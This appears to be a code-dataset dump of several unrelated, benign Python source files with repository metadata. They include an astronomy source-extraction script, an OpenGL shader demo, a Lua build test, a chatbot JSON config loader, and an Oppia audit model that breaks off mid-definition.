from .atss_assigner import ATSSAssigner
from .base_assigner import BaseAssigner
from .center_region_assigner import CenterRegionAssigner
from .max_iou_assigner import MaxIoUAssigner
from .point_assigner import PointAssigner
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'PointAssigner', 'ATSSAssigner', 'CenterRegionAssigner'
]
| 36.538462 | 77 | 0.835789 | from .approx_max_iou_assigner import ApproxMaxIoUAssigner
from .assign_result import AssignResult
from .atss_assigner import ATSSAssigner
from .base_assigner import BaseAssigner
from .center_region_assigner import CenterRegionAssigner
from .max_iou_assigner import MaxIoUAssigner
from .point_assigner import PointAssigner
__all__ = [
'BaseAssigner', 'MaxIoUAssigner', 'ApproxMaxIoUAssigner', 'AssignResult',
'PointAssigner', 'ATSSAssigner', 'CenterRegionAssigner'
]
| true | true |
f72307576e0edce787b49d3a64c9a3b339e49912 | 4,644 | py | Python | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | source_extraction.py | cebarbosa/summer_project_hydra | 386a01253d92075ff00396229e83caf44eed07a3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on 28/10/2017
@author: Carlos Eduardo Barbosa
Detection of sources in data and separation of bins prior to Voronoi
tesselation
"""
from __future__ import division, print_function
import os
import pyregion
import numpy as np
from astropy.io import fits
from astropy.convolution import Gaussian2DKernel, convolve
from astropy.table import Table
import matplotlib.pyplot as plt
from astropy.stats import SigmaClip
from photutils.background import Background2D, MedianBackground
import sewpy
import context
from misc import array_from_header
def background_removed_data(imgname, redo=False, output=None, hdunum=1):
""" Remove background from the image """
data = fits.getdata(imgname, ext=1)
output = "detection.fits"
if os.path.exists(output) and not redo:
return output
sigma_clip = SigmaClip(sigma=3.)
bkg_estimator = MedianBackground()
bkg = Background2D(data, (8, 8), filter_size=(5, 5),
sigma_clip=sigma_clip, bkg_estimator = bkg_estimator)
outdata = data - bkg.background
fits.writeto(output, outdata, overwrite=True)
return output
def mask_from_regions(imgname, redo=False):
""" Mask regions marked in file mask.reg made in ds9. """
data = fits.getdata(imgname)
filename = "mask.reg"
outfile = "detection_masked.fits"
if os.path.exists(outfile) and not redo:
mask = fits.getdata(outfile)
return mask
r = pyregion.open(filename)
for i, region in enumerate(r.get_filter()):
mask = region.mask(data.shape)
data[mask] = np.nan
hdu = fits.PrimaryHDU(data)
hdu.writeto(outfile, overwrite=True)
return outfile
def run_sextractor(img, redo=False, outfile=None):
""" Produces a catalogue of sources in a given field. """
if outfile is None:
outfile = "source-catalog.fits"
if os.path.exists(outfile) and not redo:
return outfile
params = ["NUMBER", "X_IMAGE", "Y_IMAGE", "KRON_RADIUS", "ELLIPTICITY",
"THETA_IMAGE", "A_IMAGE", "B_IMAGE", "MAG_AUTO", "FLUX_RADIUS"]
config = {"CHECKIMAGE_TYPE": "BACKGROUND",
"CHECKIMAGE_NAME": "background.fits",
"DETECT_THRESH" : 1.5}
sew = sewpy.SEW(config=config, sexpath="source-extractor", params=params)
cat = sew(img)
cat["table"].write(outfile, format="fits", overwrite=True)
return outfile
def mask_sources(img, cat, ignore=None, redo=False, output=None):
""" Produces segmentation image with bins for detected sources using
elliptical regions. """
if output is None:
output = "sources_mask.fits"
if os.path.exists(output) and not redo:
return output
data = fits.getdata(img)
ydim, xdim = data.shape
xx, yy = np.meshgrid(np.arange(1, xdim + 1), np.arange(1, ydim + 1))
table = Table.read(cat, 1)
if ignore is not None:
idx = np.array([i for i,x in enumerate(table["NUMBER"]) if x not in
ignore])
table = table[idx]
axratio = table["B_IMAGE"] / table["A_IMAGE"]
# table = table[axratio > 0.4]
mask = np.zeros_like(data)
for source in table:
R = calc_isophotes(xx, yy, source["X_IMAGE"], source["Y_IMAGE"], \
source["THETA_IMAGE"] - 90, source["B_IMAGE"] /
source["A_IMAGE"])
Rmax = 1.5 * source["KRON_RADIUS"]
mask += np.where(R <= Rmax, 1, 0)
hdu = fits.PrimaryHDU(mask)
hdu.writeto(output, overwrite=True)
return output
def calc_isophotes(x, y, x0, y0, PA, q):
""" Calculate isophotes for a given component. """
x = np.copy(x) - x0
y = np.copy(y) - y0
shape = x.shape
theta = np.radians(PA)
c, s = np.cos(theta), np.sin(theta)
rot = np.array([[s, c], [-c, s]])
xy = np.dot(np.column_stack((x.flatten(), y.flatten())), rot).T
x = np.reshape(xy[0], newshape=shape)
y = np.reshape(xy[1], newshape=shape)
return np.sqrt(np.power(x, 2) + np.power(y / q, 2))
def run_ngc3311(redo=False):
data_dir = os.path.join(context.home_dir, "data")
fields = context.fields
for field in fields:
os.chdir(os.path.join(data_dir, field))
if field == "fieldA":
imgname = "ellipse_model.fits"
else:
imgname = f"sn_field{field[-1]}.fits"
detimg = background_removed_data(imgname, redo=redo)
immasked = mask_from_regions(detimg, redo=redo)
sexcat = run_sextractor(immasked, redo=redo)
mask_sources(immasked, sexcat, redo=redo)
if __name__ == "__main__":
run_ngc3311(redo=True)
| 35.181818 | 78 | 0.639104 |
from __future__ import division, print_function
import os
import pyregion
import numpy as np
from astropy.io import fits
from astropy.convolution import Gaussian2DKernel, convolve
from astropy.table import Table
import matplotlib.pyplot as plt
from astropy.stats import SigmaClip
from photutils.background import Background2D, MedianBackground
import sewpy
import context
from misc import array_from_header
def background_removed_data(imgname, redo=False, output=None, hdunum=1):
data = fits.getdata(imgname, ext=1)
output = "detection.fits"
if os.path.exists(output) and not redo:
return output
sigma_clip = SigmaClip(sigma=3.)
bkg_estimator = MedianBackground()
bkg = Background2D(data, (8, 8), filter_size=(5, 5),
sigma_clip=sigma_clip, bkg_estimator = bkg_estimator)
outdata = data - bkg.background
fits.writeto(output, outdata, overwrite=True)
return output
def mask_from_regions(imgname, redo=False):
data = fits.getdata(imgname)
filename = "mask.reg"
outfile = "detection_masked.fits"
if os.path.exists(outfile) and not redo:
mask = fits.getdata(outfile)
return mask
r = pyregion.open(filename)
for i, region in enumerate(r.get_filter()):
mask = region.mask(data.shape)
data[mask] = np.nan
hdu = fits.PrimaryHDU(data)
hdu.writeto(outfile, overwrite=True)
return outfile
def run_sextractor(img, redo=False, outfile=None):
if outfile is None:
outfile = "source-catalog.fits"
if os.path.exists(outfile) and not redo:
return outfile
params = ["NUMBER", "X_IMAGE", "Y_IMAGE", "KRON_RADIUS", "ELLIPTICITY",
"THETA_IMAGE", "A_IMAGE", "B_IMAGE", "MAG_AUTO", "FLUX_RADIUS"]
config = {"CHECKIMAGE_TYPE": "BACKGROUND",
"CHECKIMAGE_NAME": "background.fits",
"DETECT_THRESH" : 1.5}
sew = sewpy.SEW(config=config, sexpath="source-extractor", params=params)
cat = sew(img)
cat["table"].write(outfile, format="fits", overwrite=True)
return outfile
def mask_sources(img, cat, ignore=None, redo=False, output=None):
if output is None:
output = "sources_mask.fits"
if os.path.exists(output) and not redo:
return output
data = fits.getdata(img)
ydim, xdim = data.shape
xx, yy = np.meshgrid(np.arange(1, xdim + 1), np.arange(1, ydim + 1))
table = Table.read(cat, 1)
if ignore is not None:
idx = np.array([i for i,x in enumerate(table["NUMBER"]) if x not in
ignore])
table = table[idx]
axratio = table["B_IMAGE"] / table["A_IMAGE"]
mask = np.zeros_like(data)
for source in table:
R = calc_isophotes(xx, yy, source["X_IMAGE"], source["Y_IMAGE"], \
source["THETA_IMAGE"] - 90, source["B_IMAGE"] /
source["A_IMAGE"])
Rmax = 1.5 * source["KRON_RADIUS"]
mask += np.where(R <= Rmax, 1, 0)
hdu = fits.PrimaryHDU(mask)
hdu.writeto(output, overwrite=True)
return output
def calc_isophotes(x, y, x0, y0, PA, q):
x = np.copy(x) - x0
y = np.copy(y) - y0
shape = x.shape
theta = np.radians(PA)
c, s = np.cos(theta), np.sin(theta)
rot = np.array([[s, c], [-c, s]])
xy = np.dot(np.column_stack((x.flatten(), y.flatten())), rot).T
x = np.reshape(xy[0], newshape=shape)
y = np.reshape(xy[1], newshape=shape)
return np.sqrt(np.power(x, 2) + np.power(y / q, 2))
def run_ngc3311(redo=False):
data_dir = os.path.join(context.home_dir, "data")
fields = context.fields
for field in fields:
os.chdir(os.path.join(data_dir, field))
if field == "fieldA":
imgname = "ellipse_model.fits"
else:
imgname = f"sn_field{field[-1]}.fits"
detimg = background_removed_data(imgname, redo=redo)
immasked = mask_from_regions(detimg, redo=redo)
sexcat = run_sextractor(immasked, redo=redo)
mask_sources(immasked, sexcat, redo=redo)
if __name__ == "__main__":
run_ngc3311(redo=True)
| true | true |
f7230872635c2b1a194e34f4a501f57c0621b597 | 4,793 | py | Python | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | 1 | 2021-12-22T11:45:38.000Z | 2021-12-22T11:45:38.000Z | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | 1 | 2020-02-01T03:50:20.000Z | 2020-02-01T03:52:03.000Z | chapt03/listing310.py | ohlogic/PythonOpenGLSuperBible7Glut | 6100359da13f8ef94070cf4d8818de31fc72cf65 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# Copyright © 2012-2015 Graham Sellers
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import sys
import time
fullscreen = True
try:
from OpenGL.GLUT import *
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('''
ERROR: PyOpenGL not installed properly.
''')
sys.exit()
from math import cos, sin
# Vertex program
vertex_shader_source = '''
#version 450 core
void main(void)
{
const vec4 vertices[3] = vec4[3](
vec4(0.25, -0.25, 0.5, 1.0),
vec4(-0.25, -0.25, 0.5, 1.0),
vec4(0.25, 0.25, 0.5, 1.0));
// Index into our array using gl_VertexID
gl_Position = vertices[gl_VertexID];
}
'''
# Fragment program
fragment_shader_source = '''
#version 450 core
out vec4 color;
void main(void)
{
color = vec4(sin(gl_FragCoord.x * 0.25) * 0.5 + 0.5,
cos(gl_FragCoord.y * 0.25) * 0.5 + 0.5,
sin(gl_FragCoord.x * 0.15) * cos(gl_FragCoord.y * 0.15),
1.0);
}
'''
def compile_program(vertex_source, fragment_source):
vertex_shader = None
fragment_shader = None
if vertex_source:
vertex_shader = glCreateShader(GL_VERTEX_SHADER)
glShaderSource(vertex_shader, vertex_source)
glCompileShader(vertex_shader)
if not glGetShaderiv(vertex_shader, GL_COMPILE_STATUS):
raise Exception('failed to compile shader "%s":\n%s' %
('vertex_shader', glGetShaderInfoLog(vertex_shader)))
if fragment_source:
fragment_shader = glCreateShader(GL_FRAGMENT_SHADER)
glShaderSource(fragment_shader, fragment_source)
glCompileShader(fragment_shader)
if not glGetShaderiv(fragment_shader, GL_COMPILE_STATUS):
raise Exception('failed to compile shader "%s":\n%s' %
('fragment_shader', glGetShaderInfoLog(fragment_shader)))
program = glCreateProgram()
glAttachShader(program, vertex_shader)
glAttachShader(program, fragment_shader)
glLinkProgram(program)
if vertex_shader:
glDeleteShader(vertex_shader)
if fragment_shader:
glDeleteShader(fragment_shader)
return program
class Scene:
def __init__(self):
pass
def display(self):
currentTime = time.time()
color = [ 0.0, 0.2, 0.0, 1.0 ];
glClearBufferfv(GL_COLOR, 0, color)
glUseProgram(compile_program(vertex_shader_source, fragment_shader_source))
glDrawArrays(GL_TRIANGLES, 0, 3);
glutSwapBuffers()
def reshape(self, width, height):
pass
def keyboard(self, key, x, y ):
global fullscreen
print ('key:' , key)
if key == b'\x1b': # ESC
sys.exit()
elif key == b'f' or key == b'F': #fullscreen toggle
if (fullscreen == True):
glutReshapeWindow(512, 512)
glutPositionWindow(int((1360/2)-(512/2)), int((768/2)-(512/2)))
fullscreen = False
else:
glutFullScreen()
fullscreen = True
print('done')
def init(self):
pass
if __name__ == '__main__':
start = time.time()
glutInit()
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
w1 = glutCreateWindow('Listing 3.10')
glutInitWindowPosition(int((1360/2)-(512/2)), int((768/2)-(512/2)))
fullscreen = False
#glutFullScreen()
scene = Scene()
glutReshapeFunc(scene.reshape)
glutDisplayFunc(scene.display)
glutKeyboardFunc(scene.keyboard)
glutIdleFunc(scene.display)
scene.init()
glutMainLoop()
| 25.094241 | 83 | 0.638431 |
import sys
import time
fullscreen = True
try:
from OpenGL.GLUT import *
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('''
ERROR: PyOpenGL not installed properly.
''')
sys.exit()
from math import cos, sin
vertex_shader_source = '''
#version 450 core
void main(void)
{
const vec4 vertices[3] = vec4[3](
vec4(0.25, -0.25, 0.5, 1.0),
vec4(-0.25, -0.25, 0.5, 1.0),
vec4(0.25, 0.25, 0.5, 1.0));
// Index into our array using gl_VertexID
gl_Position = vertices[gl_VertexID];
}
'''
fragment_shader_source = '''
#version 450 core
out vec4 color;
void main(void)
{
color = vec4(sin(gl_FragCoord.x * 0.25) * 0.5 + 0.5,
cos(gl_FragCoord.y * 0.25) * 0.5 + 0.5,
sin(gl_FragCoord.x * 0.15) * cos(gl_FragCoord.y * 0.15),
1.0);
}
'''
def compile_program(vertex_source, fragment_source):
vertex_shader = None
fragment_shader = None
if vertex_source:
vertex_shader = glCreateShader(GL_VERTEX_SHADER)
glShaderSource(vertex_shader, vertex_source)
glCompileShader(vertex_shader)
if not glGetShaderiv(vertex_shader, GL_COMPILE_STATUS):
raise Exception('failed to compile shader "%s":\n%s' %
('vertex_shader', glGetShaderInfoLog(vertex_shader)))
if fragment_source:
fragment_shader = glCreateShader(GL_FRAGMENT_SHADER)
glShaderSource(fragment_shader, fragment_source)
glCompileShader(fragment_shader)
if not glGetShaderiv(fragment_shader, GL_COMPILE_STATUS):
raise Exception('failed to compile shader "%s":\n%s' %
('fragment_shader', glGetShaderInfoLog(fragment_shader)))
program = glCreateProgram()
glAttachShader(program, vertex_shader)
glAttachShader(program, fragment_shader)
glLinkProgram(program)
if vertex_shader:
glDeleteShader(vertex_shader)
if fragment_shader:
glDeleteShader(fragment_shader)
return program
class Scene:
def __init__(self):
pass
def display(self):
currentTime = time.time()
color = [ 0.0, 0.2, 0.0, 1.0 ];
glClearBufferfv(GL_COLOR, 0, color)
glUseProgram(compile_program(vertex_shader_source, fragment_shader_source))
glDrawArrays(GL_TRIANGLES, 0, 3);
glutSwapBuffers()
def reshape(self, width, height):
pass
def keyboard(self, key, x, y ):
global fullscreen
print ('key:' , key)
if key == b'\x1b':
sys.exit()
elif key == b'f' or key == b'F':
if (fullscreen == True):
glutReshapeWindow(512, 512)
glutPositionWindow(int((1360/2)-(512/2)), int((768/2)-(512/2)))
fullscreen = False
else:
glutFullScreen()
fullscreen = True
print('done')
def init(self):
pass
if __name__ == '__main__':
start = time.time()
glutInit()
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
w1 = glutCreateWindow('Listing 3.10')
glutInitWindowPosition(int((1360/2)-(512/2)), int((768/2)-(512/2)))
fullscreen = False
scene = Scene()
glutReshapeFunc(scene.reshape)
glutDisplayFunc(scene.display)
glutKeyboardFunc(scene.keyboard)
glutIdleFunc(scene.display)
scene.init()
glutMainLoop()
| true | true |
f72308dbe1714573180f73ead6dbb0749b0d73a2 | 1,913 | py | Python | tests/functional/libraries/test_lua.py | carlbrown/needy | 5a70726c9846f86a88be896ec39740296d503835 | [
"MIT"
] | 65 | 2015-07-21T01:40:17.000Z | 2019-06-10T10:46:28.000Z | tests/functional/libraries/test_lua.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 110 | 2015-07-21T01:41:40.000Z | 2017-01-18T23:13:30.000Z | tests/functional/libraries/test_lua.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 4 | 2015-07-20T02:45:43.000Z | 2016-07-31T21:48:39.000Z | import json
import os
import sys
from ..functional_test import TestCase
class LuaTest(TestCase):
def test_satisfy_from_source(self):
with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
needs_file.write(json.dumps({
'libraries': {
'lua': {
'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
'project': {
'exclude': ['lua.c', 'luac.c']
}
}
}
}))
self.assertEqual(self.satisfy(), 0)
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'lua.lib' if sys.platform == 'win32' else 'liblua.a')))
if sys.platform != 'win32':
def test_satisfy_with_make(self):
with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
needs_file.write(json.dumps({
'libraries': {
'lua': {
'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
'project': {
'make-targets': 'generic',
'make-prefix-arg': 'INSTALL_TOP',
}
}
}
}))
self.assertEqual(self.satisfy(), 0)
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'liblua.a')))
| 43.477273 | 143 | 0.48092 | import json
import os
import sys
from ..functional_test import TestCase
class LuaTest(TestCase):
def test_satisfy_from_source(self):
with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
needs_file.write(json.dumps({
'libraries': {
'lua': {
'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
'project': {
'exclude': ['lua.c', 'luac.c']
}
}
}
}))
self.assertEqual(self.satisfy(), 0)
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'lua.lib' if sys.platform == 'win32' else 'liblua.a')))
if sys.platform != 'win32':
def test_satisfy_with_make(self):
with open(os.path.join(self.path(), 'needs.json'), 'w') as needs_file:
needs_file.write(json.dumps({
'libraries': {
'lua': {
'download': 'http://www.lua.org/ftp/lua-5.2.1.tar.gz',
'checksum': '6bb1b0a39b6a5484b71a83323c690154f86b2021',
'project': {
'make-targets': 'generic',
'make-prefix-arg': 'INSTALL_TOP',
}
}
}
}))
self.assertEqual(self.satisfy(), 0)
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'include', 'lua.h')))
self.assertTrue(os.path.isfile(os.path.join(self.build_directory('lua'), 'lib', 'liblua.a')))
| true | true |
f7230a0700ec0f71e3df6dba98dec207b83c834b | 876 | py | Python | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/api_lib/datastore/constants.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Constants used for Cloud Datastore."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
# Special marker used for the default namespace in gcloud commands.
DEFAULT_NAMESPACE = '(default)'
| 38.086957 | 74 | 0.768265 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
DEFAULT_NAMESPACE = '(default)'
| true | true |
f7230b0b25991ce2d65383489baf50b9ebc9effb | 5,416 | py | Python | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | null | null | null | src/programy/config/file/json_file.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
] | 4 | 2019-04-01T15:42:23.000Z | 2020-11-05T08:14:27.000Z | """
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
from programy.utils.logging.ylogger import YLogger
from programy.config.file.file import BaseConfigurationFile
from programy.config.programy import ProgramyConfiguration
from programy.utils.substitutions.substitues import Substitutions
class JSONConfigurationFile(BaseConfigurationFile):
def __init__(self):
BaseConfigurationFile.__init__(self)
self.json_data = None
def load_from_text(self, text, client_configuration, bot_root):
self.json_data = json.loads(text)
configuration = ProgramyConfiguration(client_configuration)
configuration.load_config_data(self, bot_root)
return configuration
def load_from_file(self, filename, client_configuration, bot_root):
configuration = ProgramyConfiguration(client_configuration)
try:
with open(filename, 'r+', encoding="utf-8") as json_data_file:
self.json_data = json.load(json_data_file)
configuration.load_config_data(self, bot_root)
except Exception as excep:
YLogger.exception(self, "Failed to open json config file [%s]", excep, filename)
return configuration
def get_section(self, section_name, parent_section=None):
if parent_section is None:
if section_name in self.json_data:
return self.json_data[section_name]
else:
if section_name in parent_section:
return parent_section[section_name]
return None
def get_keys(self, section):
return section.keys()
def get_child_section_keys(self, child_section_name, parent_section):
if child_section_name in parent_section:
return parent_section[child_section_name].keys()
return None
def get_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
return self._replace_subs(subs, option_value)
YLogger.warning(self, "Missing value for [%s] in config , return default value %s", option_name, missing_value)
return missing_value
def get_bool_option(self, section, option_name, missing_value=False, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
if isinstance(option_value, bool):
return option_value
return bool(self._replace_subs(subs, option_value))
YLogger.warning(self, "Missing value for [%s] in config, return default value %s", option_name, missing_value)
return missing_value
def get_int_option(self, section, option_name, missing_value=0, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
if isinstance(option_value, int):
return option_value
return int(self._replace_subs(subs, option_value))
if missing_value is not None:
YLogger.warning(self, "Missing value for [%s] in config, return default value %d", option_name, missing_value)
else:
YLogger.warning(self, "Missing value for [%s] in config, return default value None", option_name)
return missing_value
def get_multi_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
if missing_value is None:
missing_value = []
value = self. get_option(section, option_name, missing_value)
if isinstance(value, list):
values = value
else:
values = [value]
multis = []
for value in values:
multis.append(self._replace_subs(subs, value))
return multis
def get_multi_file_option(self, section, option_name, bot_root, missing_value=None, subs: Substitutions = None):
if missing_value is None:
missing_value = []
value = self. get_option(section, option_name, missing_value)
if isinstance(value, list):
values = value
else:
values = [value]
multis = []
for value in values:
value = self._replace_subs(subs, value)
multis.append(value.replace('$BOT_ROOT', bot_root))
return multis
| 40.721805 | 122 | 0.693501 |
import json
from programy.utils.logging.ylogger import YLogger
from programy.config.file.file import BaseConfigurationFile
from programy.config.programy import ProgramyConfiguration
from programy.utils.substitutions.substitues import Substitutions
class JSONConfigurationFile(BaseConfigurationFile):
def __init__(self):
BaseConfigurationFile.__init__(self)
self.json_data = None
def load_from_text(self, text, client_configuration, bot_root):
self.json_data = json.loads(text)
configuration = ProgramyConfiguration(client_configuration)
configuration.load_config_data(self, bot_root)
return configuration
def load_from_file(self, filename, client_configuration, bot_root):
configuration = ProgramyConfiguration(client_configuration)
try:
with open(filename, 'r+', encoding="utf-8") as json_data_file:
self.json_data = json.load(json_data_file)
configuration.load_config_data(self, bot_root)
except Exception as excep:
YLogger.exception(self, "Failed to open json config file [%s]", excep, filename)
return configuration
def get_section(self, section_name, parent_section=None):
if parent_section is None:
if section_name in self.json_data:
return self.json_data[section_name]
else:
if section_name in parent_section:
return parent_section[section_name]
return None
def get_keys(self, section):
return section.keys()
def get_child_section_keys(self, child_section_name, parent_section):
if child_section_name in parent_section:
return parent_section[child_section_name].keys()
return None
def get_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
return self._replace_subs(subs, option_value)
YLogger.warning(self, "Missing value for [%s] in config , return default value %s", option_name, missing_value)
return missing_value
def get_bool_option(self, section, option_name, missing_value=False, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
if isinstance(option_value, bool):
return option_value
return bool(self._replace_subs(subs, option_value))
YLogger.warning(self, "Missing value for [%s] in config, return default value %s", option_name, missing_value)
return missing_value
def get_int_option(self, section, option_name, missing_value=0, subs: Substitutions = None):
if option_name in section:
option_value = section[option_name]
if isinstance(option_value, int):
return option_value
return int(self._replace_subs(subs, option_value))
if missing_value is not None:
YLogger.warning(self, "Missing value for [%s] in config, return default value %d", option_name, missing_value)
else:
YLogger.warning(self, "Missing value for [%s] in config, return default value None", option_name)
return missing_value
def get_multi_option(self, section, option_name, missing_value=None, subs: Substitutions = None):
if missing_value is None:
missing_value = []
value = self. get_option(section, option_name, missing_value)
if isinstance(value, list):
values = value
else:
values = [value]
multis = []
for value in values:
multis.append(self._replace_subs(subs, value))
return multis
def get_multi_file_option(self, section, option_name, bot_root, missing_value=None, subs: Substitutions = None):
if missing_value is None:
missing_value = []
value = self. get_option(section, option_name, missing_value)
if isinstance(value, list):
values = value
else:
values = [value]
multis = []
for value in values:
value = self._replace_subs(subs, value)
multis.append(value.replace('$BOT_ROOT', bot_root))
return multis
| true | true |
f7230c6242e45502a884e52bfeedc92cf49212a1 | 2,362 | py | Python | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-12-02T18:56:49.000Z | 2020-03-14T17:14:15.000Z | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-09-11T23:11:48.000Z | 2019-11-29T06:04:52.000Z | core/storage/audit/gae_models.py | aman-roy/oppia | 0e7066829b59bf6ce4b15c4723fe0398721cfd1a | [
"Apache-2.0"
] | 2 | 2019-12-02T18:56:56.000Z | 2020-03-16T08:03:45.000Z | # coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models for storing the audit logs."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.platform import models
import feconf
from google.appengine.ext import ndb
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
class RoleQueryAuditModel(base_models.BaseModel):
"""Records the data for query made to the role structure using admin
interface.
Instances of this class are keyed by a custom Id.
[user_id].[timestamp_in_sec].[intent].[random_number]
"""
# The user_id of the user making query.
user_id = ndb.StringProperty(required=True, indexed=True)
# The intent of making query (viewing (by role or username)
# or updating role).
intent = ndb.StringProperty(required=True, choices=[
